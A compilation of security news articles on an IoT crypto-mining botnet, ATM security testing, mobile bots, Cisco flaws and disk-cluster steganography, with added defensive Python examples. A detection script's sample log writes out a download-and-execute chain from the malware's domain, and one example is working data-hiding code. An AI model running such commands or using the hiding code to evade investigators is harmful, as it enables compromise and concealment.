Cryptocurrency-Mining Botnet Attacks SSH Service Running on IoT Devices

A newly discovered cryptocurrency-mining bot targets Internet of Things (IoT) devices that expose an SSH service and other IoT-related ports, including 22, 2222, and 502.

Cryptocurrency-mining malware consumes system resources and uses them to mine cryptocurrency without the owner's permission.

This crypto-mining attack works against any connected device or server that runs an SSH service.

The SSH service provides a secure connection to IoT (Internet of Things) devices, the term for devices that are connected to the Internet.

Attackers use various social-engineering tricks to compromise victims and then mine Monero and Ethereum coins on the victims' devices for large profits.

The bot mainly searches for devices with an open Remote Desktop Protocol (RDP) port, takes advantage of vulnerable devices, and runs a script that downloads and installs the malware.

Botnet Infection process on SSH Service

Initially, the botnet hosts the malicious script on a specific website; the script downloads files from hxxps://www[.]yiluzhuanqian[.]com/soft/Linux/yilu_2_[.]tgz and saves them to the temp folder.

This is one of the most widely used exploitation techniques against Linux-based servers, and the bot is able to load miners on Linux.

The site the script is downloaded from appears to be a financial scam site, and the attacker uses techniques that switch to another domain to continue operations if the link is blocked.

Once the downloaded malicious script executes, it first checks Internet connectivity by connecting to Baidu.com; after that it checks which OS is running on the target, as it specifically targets Linux-based operating systems.

It also sets up huge pages and memlock, which increase the computational power available for mining cryptocurrency.

Once those are set up, the script downloads the miner, disguised as a download of a libhwloc4 library, and the miner uses a persistence mechanism to keep running even after the computer reboots.

According to the Trend Micro report, the file cmd.txt lists commands used to run the “mservice” binary with parameters, which then installs the actual miner, “YiluzhuanqianSer.” (Note that the miner is related to the potential scam site domain.) Apart from this, a conf.json file contains a web shell/backdoor, and the additional directories include two binaries and a cmd.txt file containing the commands used to run the miner.

This type of mining operation that targets connected devices for profit is not the first of its kind; moreover, security incidents that use bots to target IoT devices have made headlines on several occasions, Trend Micro said.
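A defender reading the infection chain above wants to know what it looks like in host telemetry. The following Python script is an added example, not code from the Trend Micro report or this article: it scans command-audit lines for the observables the write-up names (the download domain, the dropped file names, the mservice/YiluzhuanqianSer binaries, the libhwloc4 decoy, the Baidu connectivity probe) and for the huge-page/memlock tuning the script performs. The log lines and the scoring threshold are constructed for illustration.

```python
"""Indicator scan for the SSH/IoT crypto-mining bot described above.

Added example: the indicator values come from the write-up (domain, file
names, binary names); the log lines are constructed for illustration, and the
scoring thresholds are this example's own choice.
"""
import re

# Each entry: category name -> pattern matching one observable from the write-up.
INDICATORS = {
    "download_domain": re.compile(r"yiluzhuanqian\.com", re.I),
    "dropped_file": re.compile(r"\b(cmd\.txt|conf\.json|yilu_2_\.tgz)\b", re.I),
    "miner_binary": re.compile(r"\b(mservice|YiluzhuanqianSer)\b"),
    "fake_library": re.compile(r"libhwloc4", re.I),
    # huge pages and memlock are tuned via sysctl and ulimit on Linux
    "hugepage_memlock": re.compile(r"vm\.nr_hugepages|ulimit\s+-l\b"),
    "connectivity_check": re.compile(r"baidu\.com", re.I),
}


def scan_lines(lines):
    """Return a list of (line_number, category, line) for every indicator hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for category, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((n, category, line.strip()))
    return hits


def verdict(hits, min_categories=2):
    """Classify a host. The connectivity probe alone is far too common to act on,
    so require hits in at least `min_categories` distinct categories."""
    categories = {cat for _, cat, _ in hits}
    if len(categories) >= min_categories:
        return "likely-infected"
    if categories:
        return "suspicious"
    return "clean"


# Constructed sample: a simplified shell-audit log from a Linux IoT host.
SAMPLE_LOG = [
    "root: curl -s https://www.baidu.com -o /dev/null",
    "root: wget -q https://www.yiluzhuanqian.com/soft/Linux/yilu_2_.tgz -O /tmp/yilu_2_.tgz",
    "root: tar xzf /tmp/yilu_2_.tgz -C /tmp",
    "root: sysctl -w vm.nr_hugepages=128",
    "root: ulimit -l unlimited",
    "root: sh -c \"$(cat /tmp/cmd.txt)\"",
    "root: /tmp/mservice --config /tmp/conf.json",
    "pi: ls -la /home/pi",
]

# Constructed sample from a host that only ran ordinary commands.
CLEAN_LOG = [
    "pi: sudo apt-get update",
    "pi: vim /etc/ssh/sshd_config",
]

if __name__ == "__main__":
    hits = scan_lines(SAMPLE_LOG)
    for n, cat, line in hits:
        print(f"line {n}: {cat}: {line}")
    print("verdict:", verdict(hits))
```

The categories deliberately separate weak signals (a connectivity probe, a memlock change) from strong ones (the download domain, the binary names), so that a single weak hit raises a "suspicious" flag for triage while several categories together justify isolating the device.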

Advanced ATM Penetration Testing Methods

Hackers have found various ways to break into ATMs. They are no longer restricting themselves to physical attacks such as cash/card trapping and skimming; they are also exploring new ways to attack ATM software.

An ATM is a machine that enables customers to perform banking transactions without going to the bank.

Using an ATM, a customer can withdraw or deposit cash, access a bank deposit or credit account, pay bills, change the PIN, update personal information, and so on. Since an ATM handles cash, it has become a high-priority target for hackers and thieves.

In this article, we will look at how an ATM works, the security arrangements used to protect ATMs, the different types of penetration testing used to analyse ATM security, and some security best practices that can help prevent ATM hacks.

How an ATM Works:

Most ATMs have two inputs and four outputs. The card reader and keypad are the inputs, whereas the screen, receipt printer, cash dispenser and speaker are the outputs.

There are generally two types of ATM, which differ in the way they connect to the host. They are:

1. Leased-line ATMs
2. Dial-up ATMs

Any ATM needs a data terminal with two input and four output devices. Obviously, for this to work there must also be a host processor available. The host processor is needed so that the ATM can connect and communicate with the person requesting the cash. The Internet Service Provider (ISP) also plays an essential role: it acts as the gateway to the intermediary networks and the bank's computer.

Image Credit : HowstuffWorks

A leased-line ATM has a four-wire, point-to-point dedicated telephone line that connects it to the host processor. These machines are preferred in places where customer volume is high. They are considered top of the line, and the operating costs of this type of machine are high.

Dial-up ATMs just have an ordinary telephone line with a modem and a toll-free number. As these are normal connections, their initial installation cost is lower and their operating costs are only a fraction of those of a leased-line ATM.

The host is primarily owned by the bank. It can also be owned by an ISP. If the host is owned by the bank, only machines that work for that specific bank will be supported.

ATM BPT style penetration testing

Security professionals perform advanced penetration tests on automated teller machine (ATM) solutions in the financial sector. In most cases, serious security flaws are identified in the ATM configurations and associated processes.

ATMs are tested with our ‘Business Penetration Test’ (BPT) methodology, which simulates real attacks on ATM solutions. This includes carefully designed targeted attacks that combine physical, logical and, optionally, social engineering attack vectors.

ATM security is often considered a complex area by IT security managers, who tend to focus more on the physical risks and less on the logical weaknesses in the operating system and application layer.

Meanwhile, ATM security is a business area that often lacks holistic security assessments. Our ATM tests are based on this belief and seek to paint a holistic picture of your ATM environment.

Physical controls

Many banks rely heavily on the assumption that physical access to their ATM solutions is effectively restricted. Meanwhile, repeated testing illustrates how little effort is often required to gain unauthorized access to the ATM CPU, which controls the user interface and the transaction devices.

Logical controls

With physical access to the ATM CPU, authentication mechanisms can be bypassed to gain unauthorized access to the ATM platform.

With this access, an attacker may be able to steal card data stored in file systems or memory without ever alerting the bank. Furthermore, as experts have been able to demonstrate, this unauthorized access can be extended from the ATM to the bank’s network and back-end servers by using the compromised ATM as an attack platform.

ATM solution management processes associated with third-party service providers and application development vendors are often the golden key for an attacker. They can be included in the scope of our test to identify logical weaknesses in trust relationships that an attacker could exploit to compromise an ATM.

ATM ecosystem

An ATM solution and network form a complex ecosystem that consists of different vendors and responsible agents, both internal and external to the banking organization.

Due to the complexity of this ecosystem with its distributed roles and responsibilities that cross organizational boundaries, the areas associated with security risk are often overlooked. The ATM application itself, with its software updates, operating system patches, platform hardening, and networks, is often vulnerable to attacks.

These attacks are not necessarily sophisticated and often not included in standard penetration tests.

Security Best Practices to be followed for ATM

Banks can implement security best practices to reduce the attack surface available to an attacker. These can be grouped into three categories:

1. Protection against physical attacks:

  • Detection and protection against card skimming.
  • Detection and protection against card/cash trapping.
  • Detection of keypad tampering.
  • Mirror and PIN shield to identify and prevent shoulder-surfing attacks.
  • Implementing a DVSS camera built into the ATM to capture the facial features of the user along with transaction details and timestamp.
  • Vault protection against fire, explosion, etc.
  • Lock protection against unauthorized access to banknotes or bills.
  • Electric power point and network point protection.
  • Disabling unused network and electric ports.
  • The ATM must be bolted to the floor to protect against robbery. The ATM can be fitted with a shock sensor to detect impact and movement of the machine.
  • Installation of CCTV cameras and the presence of a security guard.

2. Protection against logical attacks:

  • Protection against unauthorized booting by setting non-guessable boot and BIOS passwords. Most ATMs have a default boot password configured.
  • Protection against USB and unauthorized hard disk access.
  • OS hardening and latest patches.
  • Whitelisting of applications, services and processes on the ATM.
  • Running the ATM with a least-privilege user, following a need-to-know and need-to-have approach.
  • File integrity checks.
  • Securing the transaction logs.
  • Use of a secure channel for communication and transactions.
  • Configuring security best practices in the ATM application.
  • Antivirus protection.
  • Segregation of the ATM network from other networks.
  • Protection against malware such as Tyupkin, Ploutus, etc.

3. Protection against fraud attacks:

  • Implementation of geo-blocking: the card can only be used in its originating country or region, and the user has to obtain permission to use the card outside that country.
  • Implementation of chip-and-PIN cards to mitigate cloned- and skimmed-card attacks.
  • Implementation of behaviour monitoring that detects unusual transactions in terms of amount, place, frequency of transaction, etc.
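The geo-blocking and behaviour-monitoring controls in the fraud list above are easiest to understand as rules over a transaction stream. The Python below is an added example, not code from the article or from any bank's fraud system: it enforces a home-country/travel-list geo-block and three behaviour rules (unusual amount, too many withdrawals in a window, and a country change within that window, which is what a cloned card looks like). The card records, the CARD-0001 identifier, the ATM ids, the transactions and the thresholds are all constructed for illustration.

```python
"""Added example of the geo-blocking and behaviour-monitoring controls listed
above; it is not code from the article or from any bank. The card records,
transactions, rule thresholds and the CARD-000x identifiers are constructed."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Card:
    card_id: str                 # constructed identifier, not a real PAN
    home_country: str            # geo-blocking: the originating country
    travel_allowed: set = field(default_factory=set)  # countries the holder enabled


@dataclass
class Transaction:
    card_id: str
    amount: float
    country: str
    atm_id: str
    time: datetime


def geo_block(card, txn):
    """Geo-blocking rule: allow only the home country or pre-approved countries."""
    if txn.country == card.home_country or txn.country in card.travel_allowed:
        return None
    return f"geo-block: {card.card_id} used in {txn.country}"


def behaviour_flags(history, txn, max_amount=500.0,
                    window=timedelta(hours=1), max_per_window=3):
    """Behaviour monitoring: compare one withdrawal with the card's recent
    history and return the rules it trips (amount, frequency, place)."""
    flags = []
    if txn.amount > max_amount:
        flags.append(f"amount {txn.amount:.2f} above limit {max_amount:.2f}")
    recent = [h for h in history
              if h.card_id == txn.card_id and txn.time - h.time <= window]
    if len(recent) + 1 > max_per_window:
        flags.append(f"{len(recent) + 1} withdrawals within {window}")
    if any(h.country != txn.country for h in recent):
        flags.append(f"country changed within {window} (possible cloned card)")
    return flags


def screen(cards, transactions):
    """Run transactions (already in time order) through both controls.
    Returns {index: [reasons]} for every transaction that should be held."""
    held = {}
    history = []
    for i, txn in enumerate(transactions):
        reasons = []
        blocked = geo_block(cards[txn.card_id], txn)
        if blocked:
            reasons.append(blocked)
        reasons.extend(behaviour_flags(history, txn))
        if reasons:
            held[i] = reasons
        history.append(txn)     # held attempts still count towards frequency
    return held


# Constructed sample: one card, seven withdrawal attempts over two days.
T0 = datetime(2024, 1, 1, 9, 0)
CARDS = {"CARD-0001": Card("CARD-0001", "IN", {"SG"})}
TRANSACTIONS = [
    Transaction("CARD-0001", 200.0, "IN", "ATM-MUM-01", T0),
    Transaction("CARD-0001", 200.0, "IN", "ATM-MUM-02", T0 + timedelta(minutes=20)),
    Transaction("CARD-0001", 200.0, "IN", "ATM-MUM-02", T0 + timedelta(minutes=40)),
    Transaction("CARD-0001", 200.0, "IN", "ATM-MUM-03", T0 + timedelta(minutes=50)),
    Transaction("CARD-0001", 200.0, "BR", "ATM-RIO-01", T0 + timedelta(minutes=65)),
    Transaction("CARD-0001", 900.0, "SG", "ATM-SIN-01", T0 + timedelta(days=1, hours=3)),
    Transaction("CARD-0001", 100.0, "SG", "ATM-SIN-01", T0 + timedelta(days=1, hours=3, minutes=30)),
]

if __name__ == "__main__":
    for idx, reasons in screen(CARDS, TRANSACTIONS).items():
        print(idx, TRANSACTIONS[idx].atm_id, reasons)
```

Held attempts are kept in the history on purpose: a fraudster who is declined keeps trying, and the frequency rule should see those attempts. The geo-block fires on its own, while the behaviour rules are meant to be tuned per issuer against real withdrawal statistics rather than the fixed numbers used here.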

Assessment of ATM Security Solution installed in the ATM:

Most ATMs run on Windows XP or 7. Patching each individual ATM is quite a complex process. Since Windows XP is no longer supported by Microsoft, many ATM vendors use a security solution to mitigate the threats related to ATM attacks, such as malware-based attacks and OS-level vulnerabilities. These security solutions allow the ATM application to run in a very restrictive environment with limited services and processes in the back end. Two such security solutions are McAfee Solidcore and Phoenix Vista ATM.

McAfee Solidcore:

McAfee Application Control blocks unauthorized executables on servers, corporate desktops, and fixed-function devices. Using a dynamic trust model and innovative security features such as local and global reputation intelligence, real-time behavioral analytics, and auto-immunization of endpoints, it immediately thwarts advanced persistent threats—without requiring labor-intensive list management or signature updates.

  • Complete protection from unwanted applications with coverage of executable files, libraries, drivers, Java apps, ActiveX controls, scripts, and specialty code.
  • Flexibility for desktop users and server admins with self-approval and auto-approval based on application rating.
  • Viable security for fixed-function, legacy, and modern systems.
  • Patch cycle reduction and advanced memory protection.
  • Centralized, integrated management via McAfee ePolicy Orchestrator.

Phoenix Vista ATM:

Phoenix Vista ATM is a product of Phoenix Interactive Design Inc. This solution integrates with the ATM application itself. It works on file-integrity checking: any modification of or tampering with the application's critical files results in a system shutdown. This prevents any unauthorized program from modifying application-specific files.

XFS (eXtensions for Financial Services) provides a client-server architecture for financial applications on the Microsoft Windows platform, especially for peripheral devices such as ATMs that are unique to the financial industry. It is an international standard promoted by the European Committee for Standardization (known by the acronym CEN, hence CEN/XFS). XFS provides a common API for accessing and manipulating various financial-services devices regardless of manufacturer.

Vista ATM communicates with the XFS layer, which issues commands to hardware such as the ATM's cash dispenser to dispense cash. Any unauthorized modification of XFS files triggers the Vista ATM application to forcibly restart the machine. The machine restarts 4-5 times, after which it goes into maintenance mode, which does not allow the user to perform any transaction.
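Both the "file integrity checks" control in the logical-attack list and the Vista ATM behaviour just described come down to the same mechanism: hash a baseline of the critical files, re-check it, and take the machine out of service when the check fails. The Python below is an added example of that mechanism and is not Phoenix Interactive's or McAfee's code; the directory layout, the xfs_component.bin file name and the "restart, then maintenance mode after five failures" policy are constructed to mirror the description above.

```python
"""Added example: a file-integrity baseline and check of the kind the ATM
security solutions above rely on. The directory layout, file names and the
"maintenance mode after repeated failures" policy are constructed for
illustration; nothing here is Phoenix Interactive's or McAfee's code."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Hash every regular file under root; keys are paths relative to root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def check_integrity(root, baseline):
    """Return the violations as three sets: modified, deleted and added files."""
    current = build_baseline(root)
    modified = {p for p in baseline if p in current and current[p] != baseline[p]}
    deleted = set(baseline) - set(current)
    added = set(current) - set(baseline)
    return {"modified": modified, "deleted": deleted, "added": added}


class IntegrityEnforcer:
    """Mimics the response described above: a violation forces a restart, and
    after max_restarts consecutive violations the machine is taken out of
    service (maintenance mode) instead of restarting again."""

    def __init__(self, root, baseline, max_restarts=5):
        self.root, self.baseline, self.max_restarts = root, baseline, max_restarts
        self.restarts = 0
        self.state = "in-service"

    def tick(self):
        """One integrity check; returns the action the ATM would take."""
        result = check_integrity(self.root, self.baseline)
        if not any(result.values()):
            return "ok"
        self.restarts += 1
        if self.restarts >= self.max_restarts:
            self.state = "maintenance"
            return "maintenance"
        return "restart"


def demo():
    """Build a stand-in XFS directory, baseline it, then tamper with a file."""
    root = tempfile.mkdtemp(prefix="xfs-demo-")
    os.makedirs(os.path.join(root, "xfs"))
    target = os.path.join(root, "xfs", "xfs_component.bin")   # constructed name
    with open(target, "wb") as f:
        f.write(b"constructed stand-in for an XFS component\n")
    baseline = build_baseline(root)
    enforcer = IntegrityEnforcer(root, baseline, max_restarts=5)
    before = enforcer.tick()                        # clean check
    with open(target, "ab") as f:
        f.write(b"injected bytes\n")                # simulated tampering
    responses = [enforcer.tick() for _ in range(5)]
    return before, responses, enforcer.state


if __name__ == "__main__":
    print(demo())
```

The baseline itself must live somewhere the attacker cannot rewrite (a signed manifest or a separate protected store); a baseline stored next to the files it protects can simply be regenerated after tampering, which is exactly the weakness the whitelisting and boot-password controls above are meant to close.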

Mobile is the new frontier for malicious bots

Distil Networks analyzed over 100 million mobile devices on its networks. The findings suggest that sophisticated cybercriminals and bot operators now use a new technique, leveraging mobile devices, to avoid detection and execute a number of nefarious acts. At this time, 5.8 percent of all mobile devices across six major cellular networks are used in such automated attacks and represent eight percent of all bad bot traffic.

This bad bot traffic is purposefully deployed against any business with a web presence to carry out acts that include web scraping, brute force attacks, competitive data mining, online fraud, account hijacking, data theft, spam and digital ad fraud.

Uncovered by the Distil Research Lab, the data reveals a new method by which perpetrators connect through cellular gateways to target a large variety of websites and apps simultaneously. Cellular gateways handle a huge volume of requests per minute, many of which are legitimate, making it difficult to identify and block criminal ones.

Within some cellular carriers, a single IP address can serve more than 4,000 devices per day, making cellular traffic an ideal place for bots to remain undetected. As mobile devices move through different gateways (as device owners change location throughout the day), bots effectively change identities, making detection even more difficult.

Mobile bots by the numbers:

  • Sample size: Over 100 million devices
  • Number of mobile carriers researched: Six
  • Percentage of mobile ISP gateways used in bad bot attacks: 44 percent
  • Percentage of total bad bot traffic deriving from mobile devices on cellular networks: 8 percent
  • Percentage of mobile devices making bad bot requests on cellular networks: 5.8 percent
  • Average number of bad bot requests by each device per day: 50.

“Mobile is the new frontier for bot operators, as they can perform highly advanced attacks while remaining hidden in plain sight,” said Rami Essaid, chief product and strategy officer at Distil Networks. “Whether inadvertently downloaded through an email attachment, or embedded in a seemingly legitimate app, millions of consumers unknowingly carry malware on their devices that allows cybercriminals to conduct bot attacks, abuse and fraud. We have seen bot operators develop and enhance their techniques throughout the years, but the threat to mobile devices is real and growing, and can have detrimental consequences.”

Cisco plugs critical flaws in many switches, security appliances

Cisco has released security updates to address a bucketload of vulnerabilities affecting multiple products, including 24 critical and high-severity flaws found in many of its switches, next generation firewalls and security appliances.

Those vulnerabilities are present in Cisco NX-OS Software, which enables network automation and programmatic provisioning and configuration of the devices via APIs, and in Cisco FXOS (Firepower eXtensible Operating System).

“Successful exploitation of the vulnerabilities could allow an attacker to gain unauthorized access to an affected device, gain elevated privileges for an affected device, execute arbitrary code, execute arbitrary commands, gain access to sensitive information, or cause a denial of service (DoS) condition on an affected device,” the company explained.

They can be exploited via specially crafted packets (HTTP or HTTPS, Cisco Fabric Services, SNMP, IGMP) and messages (Cisco Discovery Protocol and BGP update messages).

Twelve of the vulnerabilities affect both Cisco FXOS Software and Cisco NX-OS Software and the remaining vulnerabilities affect only Cisco NX-OS Software. None of the vulnerabilities affect Cisco IOS Software or Cisco IOS XE Software.

There are no workarounds for the vulnerabilities, so administrators should implement the offered updates.

Typosquatting-Use of Doppelganger Domains to steal data

We often mistype domain names when we are searching the web or trying to access a website. For example, instead of gmail.com we may type gamil.com, or icicibank may be typed as icici bank. Researchers have now shown that by creating ‘doppelganger’ (from the German, meaning duplicate or double) domains it is possible to steal information. An extract of the article has been included here.

Covert hard drive fragmentation embeds a spy’s secrets

GOOD news for spies. There is now a way to hide data on a hard drive without using encryption. Instead of using a cipher to scramble text, the method involves manipulating the location of data fragments.

The inventors say their method makes it possible to encode a 20-megabyte message on a 160-gigabyte portable hard drive. It hides data so well that its existence would be “unreasonably complex” to detect, they say.

Encryption should sometimes be avoided, says Hassan Khan at the University of Southern California in Los Angeles, because the gobbledegook it creates is a dead giveaway: it shows someone might have something to hide. That could spell disaster for someone trying to smuggle information out of a repressive country.

So “steganography”, hiding data in plain sight, is coming to the fore. Normally, data intended to be secret is added to the pixels in digital images, or used to change the transmission timing of internet packets. But these techniques are well known and easily detected, says Khan. So, with colleagues at the National University of Science and Technology in Islamabad, Pakistan, he has developed an alternative.

Their technique exploits the way hard drives store file data in numerous small chunks, called clusters. The operating system stores these clusters all over the disc, wherever there is free space between fragments of other files.

Khan and his colleagues have written software that ensures clusters of a file, rather than being positioned at the whim of the disc drive controller chip, as is usually the case, are positioned according to a code. All the person at the other end needs to know is which file’s cluster positions have been encoded.

The code depends on whether sequential clusters in a file are situated adjacent to each other on the hard disc or not. If they are adjacent, this corresponds to a binary 1 in the secret message. If sequential clusters are stored in different places on the disc, this encodes a binary 0 (Computers and Security, DOI: 10.1016/j.cose.2010.10.005). The recipient then uses the same software to tell them the file’s cluster positions, and hence the message. The researchers intend to make their software open source.
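The adjacency code just described is simple enough to simulate end to end. The Python below is an added example and is not the researchers' software (which the article says is intended for open-source release but is not on this page): it models a disk as a set of free cluster numbers, lays out a file so that each adjacent pair of clusters encodes a 1 and each jump encodes a 0, decodes the bits back the way the recipient's tool would, and reports the fragmentation ratio an examiner could measure. The disk size, the clusters marked as already in use, and the placement strategy (look ahead for the next run of 1s so an adjacent cluster is always available) are constructed for this example.

```python
"""Added example (not the researchers' software): a simulation of the cluster
placement code described above. A file of k+1 clusters carries k message bits:
consecutive clusters stored adjacently encode 1, a jump elsewhere encodes 0.
The disk model, the free-cluster map and the placement strategy are constructed
for illustration; the paper's own allocator is not on this page."""


def bits_from_text(text):
    """ASCII text -> list of bits, most significant bit first."""
    return [int(b) for ch in text.encode("ascii") for b in f"{ch:08b}"]


def text_from_bits(bits):
    """Inverse of bits_from_text; a trailing partial byte is ignored."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        out.append(int("".join(map(str, bits[i:i + 8])), 2))
    return out.decode("ascii")


def _run_of_ones(bits, i):
    """Length of the run of 1 bits starting at index i."""
    n = 0
    while i + n < len(bits) and bits[i + n] == 1:
        n += 1
    return n


def _find_start(free, need, avoid):
    """Smallest free cluster c (c != avoid) with c, c+1, ..., c+need all free,
    so that the next `need` adjacent placements are guaranteed to succeed."""
    for c in sorted(free):
        if c != avoid and all(c + j in free for j in range(need + 1)):
            return c
    raise ValueError("free space too fragmented to encode the message")


def encode_layout(bits, free):
    """Pick cluster numbers for a file so that its fragmentation pattern
    encodes `bits`. Returns (ordered cluster list, remaining free clusters)."""
    free = set(free)
    cur = _find_start(free, _run_of_ones(bits, 0), avoid=None)
    free.remove(cur)
    layout = [cur]
    for i, b in enumerate(bits):
        if b == 1:
            nxt = cur + 1        # adjacent cluster encodes 1
        else:                    # any non-adjacent free cluster encodes 0
            nxt = _find_start(free, _run_of_ones(bits, i + 1), avoid=cur + 1)
        free.remove(nxt)
        layout.append(nxt)
        cur = nxt
    return layout, free


def decode_layout(layout):
    """Recover the bits from the cluster chain, as the recipient's tool would."""
    return [1 if b == a + 1 else 0 for a, b in zip(layout, layout[1:])]


def fragmentation_ratio(layout):
    """Share of non-adjacent steps, which is what a forensic examiner can
    measure. For a carrier file it equals the share of 0 bits in the message,
    so on its own it does not distinguish the code from normal fragmentation."""
    steps = decode_layout(layout)
    return steps.count(0) / len(steps) if steps else 0.0


# Constructed disk: 200 clusters, a few already taken by other files.
FREE_CLUSTERS = set(range(200)) - {5, 6, 17, 30, 31, 32, 58, 77, 99, 120}


def roundtrip(text, free=FREE_CLUSTERS):
    """Encode a message into a cluster layout and decode it again."""
    layout, _ = encode_layout(bits_from_text(text), free)
    return layout, text_from_bits(decode_layout(layout))


if __name__ == "__main__":
    layout, recovered = roundtrip("hi")
    print("cluster chain:", layout)
    print("recovered:", recovered, "fragmentation:", fragmentation_ratio(layout))
```

The failure mode the article hints at (a drive too fragmented to place the next adjacent cluster) surfaces as a ValueError from `_find_start`; the look-ahead means it is raised before any cluster of the current run is committed. The ratio function is the defender's side of the same picture: because the pattern mirrors the message's bit distribution, detection has to rely on something other than the raw fragmentation level, such as a carrier whose fragmentation is inconsistent with its write history.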

“An investigator can’t tell the cluster fragmentation pattern is intentional; it looks like what you’d get after addition and deletion of files over time,” says Khan. Tests show the technique works, as long as none of the files on the hard disc are modified before handover.

“The real strength of this technique is that even a completely full drive can still have secret data added to it – simply by rearranging the clusters,” adds Khan.

Others are impressed with the technique but see limitations.

“This type of steganography could be used by spies, police or informants – but the risk is that it requires direct contact to physically exchange the USB device containing the secret data,” says Wojciech Mazurczyk, a steganographer at Warsaw University of Technology in Poland. “So it lacks the flexibility of internet steganography. Once you embed the secret data on the disk it is not easy to modify it.”

But won’t making the covert hard disk software open source – as the group plans – encourage its use by criminals and terror groups?

“It’s how security vulnerability disclosure works,” says Khan. “We have identified that this is possible. Now security agencies can devise techniques to detect it.” He adds that his team have had no issues with either US or Pakistani security agencies over their development of this secret medium – despite current political tensions between the two nations.

“The use of steganographic techniques like this is likely to increase,” says Fred Piper, director of information security at Royal Holloway, University of London. “Eavesdroppers can learn much from the fact that somebody is encrypting a message.”

How Did That Towel End Up in My Suitcase?

Hotel guests may want to think twice now before walking off with that bathrobe. Linen Technology Tracking, a company in Miami, has patented a washable RFID chip that can be sewn into towels, robes and bed sheets, allowing hotels to keep track of their linens.

So far, three hotels — in Honolulu, Miami and Manhattan — are using the chip, said Linen Technology Tracking’s executive vice president, William Serbin. He said the hotels did not want their names used.

Mr. Serbin added that rising cotton prices were a motivation: “A bath towel that might have cost $5 last year could cost $8 or $9 now. High-end hotels want to watch those assets.”

The Honolulu property, which introduced the technology last summer, has reduced theft of its pool towels from 4,000 a month to just 750, saving more than $16,000 a month, Mr. Serbin said.

But the technology isn’t just about foiling thieves. The tags let properties monitor their linens in real time, so that at any given moment they know when they need to order more. With inconsistent room occupancy, some hotels have been buying new linens less frequently, Mr. Serbin said.

Assessing Internet Explorer 9

In September 2010, Microsoft commissioned a study to see how effectively Web browsers protect users against socially engineered malware and malicious websites, which are websites that look benign but aim to convince visitors to download and execute malicious software. NSS Labs conducted tests involving six browsers using real-world threats, which showed that the beta version of Microsoft’s Internet Explorer 9 (IE9) does a better job of defending against real-world malware than any other browser.

With hacking, music can take control of your car

Remote-controlled car hacking is a real possibility, researchers say

Researchers at the University of California, San Diego, and the University of Washington have spent the past two years combing through the myriad computer systems in late-model cars, looking for security flaws and developing ways to misuse them. In a new paper, they say they’ve identified a handful of ways a hacker could break into a car, including attacks over the car’s Bluetooth and cellular network systems, or through malicious software in the diagnostic tools used in automotive repair shops.